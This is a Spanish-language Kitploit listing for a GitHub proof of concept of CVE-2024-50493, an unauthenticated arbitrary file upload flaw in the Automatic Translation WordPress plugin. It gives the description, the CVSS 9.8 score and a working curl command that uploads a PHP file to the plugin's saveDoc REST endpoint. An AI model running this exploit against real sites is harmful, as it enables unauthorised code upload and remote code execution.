Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-50493 — Automatic Translation <= 1.0.4 - Carga arbitraria de archivos no autenticada | Kitploit
Herramientas/GitHubGitHub/randomrobbiebf/cve-2024-50493
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónDesarrollo de Payloads
GitHubrandomrobbiebf/cve-2024-50493

CVE-2024-50493

Automatic Translation <= 1.0.4 - Carga arbitraria de archivos no autenticada

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-50493

Automatic Translation <= 1.0.4 - Carga Arbitraria de Archivos No Autenticada

Descripción:

El plugin Automatic Translation para WordPress es vulnerable a cargas arbitrarias de archivos debido a la falta de validación del tipo de archivo en todas las versiones hasta la 1.0.4 inclusive. Esto permite que atacantes no autenticados suban archivos arbitrarios en el servidor del sitio afectado, lo que podría posibilitar la ejecución remota de código.

root@kitploit:~
CVE: CVE-2024-50493
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: automatic-translation

POC

root@kitploit:~
curl -X POST \
  -F "file_name=info.php" \
  -F "file_url=@/tmp/info.php" \
  "http://kubernetes.docker.internal/wp-json/automatic-translator/v1/saveDoc"
Descargar herramienta